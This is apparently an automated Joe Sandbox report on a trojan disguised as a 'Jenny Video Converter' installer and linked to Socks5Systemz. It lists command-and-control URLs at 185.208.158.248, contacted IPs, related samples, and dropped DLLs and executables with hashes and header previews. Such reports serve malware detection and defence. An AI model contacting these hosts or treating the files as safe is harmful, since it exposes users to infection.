                        http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82djennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.208.158.248/search/?q=67e28dd83d5df2201606a51?ajennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.208.158.248/search/?qbn1jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.remobjects.com/psN6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://fsf.org/N6jsQ3XNNX.exe, 00000000.00000002.3336120591.0000000002088000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2095937284.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098858266.0000000002170000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336768727.0000000002160000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336281247.000000000073E000.00000004.00000020.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098757251.0000000003180000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                              http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.208.158.248/search/?qjennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948jennyvideoconverter32_64.exe, 00000003.00000002.3337778653.00000000033CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd8Yojennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://185.208.1jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://www.gnu.org/licenses/N6jsQ3XNNX.exe, 00000000.00000002.3336120591.0000000002088000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2095937284.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098858266.0000000002170000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336768727.0000000002160000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3336281247.000000000073E000.00000004.00000020.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000003.2098757251.0000000003180000.00000004.00001000.00020000.00000000.sdmp, is-DDT59.tmp.2.drfalseunknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.208.158.248
                                      		diuzout.infoSwitzerland
                                      		34888SIMPLECARRER2ITtrue
                                      31.214.157.226
                                      		unknownGermany
                                      		58329RACKPLACEDEfalse
                                      89.105.201.183
                                      		unknownNetherlands
                                      		24875NOVOSERVE-ASNLfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1528604
                                      Start date and time:2024-10-08 04:12:07 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 27s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:N6jsQ3XNNX.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:46d2e28be5ad34097672b73bfa78e805.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@6/69@2/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 92%
                                      • Number of executed functions: 196
                                      • Number of non-executed functions: 247
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      22:13:31API Interceptor527521x Sleep call for process: jennyvideoconverter32_64.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.208.158.248etwSnBeIC2.exeGet hashmaliciousSocks5SystemzBrowse
                                        ZFllSoXpoT.exeGet hashmaliciousSocks5SystemzBrowse
                                          OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                            Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                              ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                AyiNxJ98mL.exeGet hashmaliciousSocks5SystemzBrowse
                                                  0IQmaTXO62.exeGet hashmaliciousSocks5SystemzBrowse
                                                    2d3on76vhf.exeGet hashmaliciousSocks5SystemzBrowse
                                                      Dw0MqzrLWq.exeGet hashmaliciousSocks5SystemzBrowse
                                                        noode.exeGet hashmaliciousSocks5SystemzBrowse
                                                          31.214.157.226cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.226/rand
                                                          89.105.201.183cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 200

                                                          Domains

                                                          No context

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          RACKPLACEDE5nv1p4kFmC.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.42
                                                          QnWrzyeT88.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.42
                                                          cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.226
                                                          REMITTANCE-NOTICE-For-Norriselectricxslx.pdfGet hashmaliciousUnknownBrowse
                                                          • 31.214.157.73
                                                          ELECTRONIC RECEIPT_Servier.htmlGet hashmaliciousUnknownBrowse
                                                          • 31.214.157.167
                                                          http://0nlinenfidiesnsdiffu9ehwsxmcmv1kgpeiwush0rfvtdgs2.omega-wls.comGet hashmaliciousUnknownBrowse
                                                          • 31.214.157.167
                                                          ELECTRONIC RECEIPT_Pvtgroup.htmlGet hashmaliciousUnknownBrowse
                                                          • 31.214.157.167
                                                          3WfBfFhuhG.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.103
                                                          pjczQr2H3P.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.103
                                                          9TSh73ulR1.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.103
                                                          NOVOSERVE-ASNLSxohdOZiA2.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          etwSnBeIC2.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          jyU2NpOg5L.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          ZFllSoXpoT.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          SQE6u2kmJL.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          sl9B1ty1iL.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          okkWFXQP0G.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          xW98tuRe0i.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 89.105.201.183
                                                          SIMPLECARRER2ITSxohdOZiA2.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.196.8.214
                                                          etwSnBeIC2.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.208.158.248
                                                          jyU2NpOg5L.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.196.8.214
                                                          ZFllSoXpoT.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.208.158.248
                                                          fHeDaDg5FQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.196.8.214
                                                          OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.208.158.248
                                                          Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.208.158.248
                                                          ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.208.158.248
                                                          SQE6u2kmJL.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.196.8.214
                                                          sl9B1ty1iL.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 185.196.8.214

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmpSxohdOZiA2.exeGet hashmaliciousSocks5SystemzBrowse
                                                            etwSnBeIC2.exeGet hashmaliciousSocks5SystemzBrowse
                                                              jyU2NpOg5L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                ZFllSoXpoT.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  fHeDaDg5FQ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    OTC71Ny3Ta.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      Ui6sm6N5JG.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        ITJ8wVQL5s.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          SQE6u2kmJL.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            sl9B1ty1iL.exeGet hashmaliciousSocks5SystemzBrowse

                                                                              Created / dropped Files

                                                                              C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3296256
                                                                              Entropy (8bit):6.848028383299471
                                                                              Encrypted:false
                                                                              SSDEEP:49152:OPCE+ilwRfPKC1XeoIFEDxeCrijlZ3ivBjgBEAf05gJVKQ28g:4+hRHF5IcxeCrijlZkxgBEAf02L28g
                                                                              MD5:65FDD2B7C5D23EEF202604FCFEFD2FF4
                                                                              SHA1:1E13A70CFCA55D95EF41BBE4F9B3BCE49F801F52
                                                                              SHA-256:1CCC772B688396131DA8841478256D0ED7B7223EA2FEA006FB9F32B14281BB52
                                                                              SHA-512:F36F2291FC1F850703DC75A642806844DDC9CF333192B0B9B5FF90DFE93BC6E6875A62CF918BA9642C6A72AF2BA9A13CCE0176A898C47F5D7A818707D8F862EC
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: Virustotal, Detection: 36%, Browse
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....D.L.................."..........y"......."...@...........................2.....*.3.....................................<.".......#.P,............................................................................".\............................text.....".......".................`....rdata...(...."..*....".............@..@_cde_2..8.....#..0....".............@....rsrc.........#.......#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\et107it45.dat

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8
                                                                              Entropy (8bit):2.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:V8/l:W
                                                                              MD5:82E0F9289A3623989779A14FBF90D05E
                                                                              SHA1:6C97C898A6BC08E791A9A2B7783EDA180426525F
                                                                              SHA-256:DDCF194378BE9A2ABFAF4DDBC22ECD36751473F9E8520A7893135AD42BE6EC06
                                                                              SHA-512:A954BBDFB94E558275896441487B8764CF59C0F11A9C64C02EBAB816DE814EB3419CFAC55E62597935DBABA0F19C0243AF62383F83A7EEA65D5FF69A89E57FEE
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:e..g....

                                                                              C:\ProgramData\et107rc45.dat

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):0.8112781244591328
                                                                              Encrypted:false
                                                                              SSDEEP:3:cln:Un
                                                                              MD5:2DC89ABB98D04AF2C94CC8B59EBD2B63
                                                                              SHA1:C2568696F7E531313A1300CA830F7051E1A85475
                                                                              SHA-256:8D4CD219A8179C66ACD195D0F07C34721C87ED2241A9DE78A228B7B336488BC8
                                                                              SHA-512:5085394D311E525AC7B549D4353FDDAAB0BFBA3C291F4B031BA27A0EDD5B71D4DF15BC030CDB7BF09EA3CBDB858F193C9EE5302131F4A823F4CC961F1ADC0AF0
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:Y...

                                                                              C:\ProgramData\et107resa.dat

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):128
                                                                              Entropy (8bit):2.9545817380615236
                                                                              Encrypted:false
                                                                              SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                              MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                              SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                              SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                              SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................

                                                                              C:\ProgramData\et107resb.dat

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):128
                                                                              Entropy (8bit):1.7095628900165245
                                                                              Encrypted:false
                                                                              SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                              MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                              SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                              SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                              SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):397808
                                                                              Entropy (8bit):6.396146399966879
                                                                              Encrypted:false
                                                                              SSDEEP:6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
                                                                              MD5:E0747D2E573E0A05A7421C5D9B9D63CC
                                                                              SHA1:C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
                                                                              SHA-256:25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
                                                                              SHA-512:201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Joe Sandbox View:
                                                                              • Filename: SxohdOZiA2.exe, Detection: malicious, Browse
                                                                              • Filename: etwSnBeIC2.exe, Detection: malicious, Browse
                                                                              • Filename: jyU2NpOg5L.exe, Detection: malicious, Browse
                                                                              • Filename: ZFllSoXpoT.exe, Detection: malicious, Browse
                                                                              • Filename: fHeDaDg5FQ.exe, Detection: malicious, Browse
                                                                              • Filename: OTC71Ny3Ta.exe, Detection: malicious, Browse
                                                                              • Filename: Ui6sm6N5JG.exe, Detection: malicious, Browse
                                                                              • Filename: ITJ8wVQL5s.exe, Detection: malicious, Browse
                                                                              • Filename: SQE6u2kmJL.exe, Detection: malicious, Browse
                                                                              • Filename: sl9B1ty1iL.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):448557
                                                                              Entropy (8bit):6.353356595345232
                                                                              Encrypted:false
                                                                              SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                                              MD5:908111F583B7019D2ED3492435E5092D
                                                                              SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                                              SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                                              SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 2%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):121524
                                                                              Entropy (8bit):6.347995296737745
                                                                              Encrypted:false
                                                                              SSDEEP:1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
                                                                              MD5:6CE25FB0302F133CC244889C360A6541
                                                                              SHA1:352892DD270135AF5A79322C3B08F46298B6E79C
                                                                              SHA-256:E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
                                                                              SHA-512:3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):65181
                                                                              Entropy (8bit):6.085572761520829
                                                                              Encrypted:false
                                                                              SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                                              MD5:98A49CC8AE2D608C6E377E95833C569B
                                                                              SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                                              SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                                              SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):171848
                                                                              Entropy (8bit):6.579154579239999
                                                                              Encrypted:false
                                                                              SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                                              MD5:236A679AB1B16E66625AFBA86A4669EB
                                                                              SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                                              SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                                              SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):706136
                                                                              Entropy (8bit):6.517672165992715
                                                                              Encrypted:false
                                                                              SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                                              MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                                              SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                                              SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                                              SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):814068
                                                                              Entropy (8bit):6.5113626552096
                                                                              Encrypted:false
                                                                              SSDEEP:24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
                                                                              MD5:5B1EB4B36F189362DEF93BF3E37354CC
                                                                              SHA1:8C0A4992A6180D0256ABF669DFDEE228F03300BA
                                                                              SHA-256:D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
                                                                              SHA-512:BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):30994
                                                                              Entropy (8bit):5.666281517516177
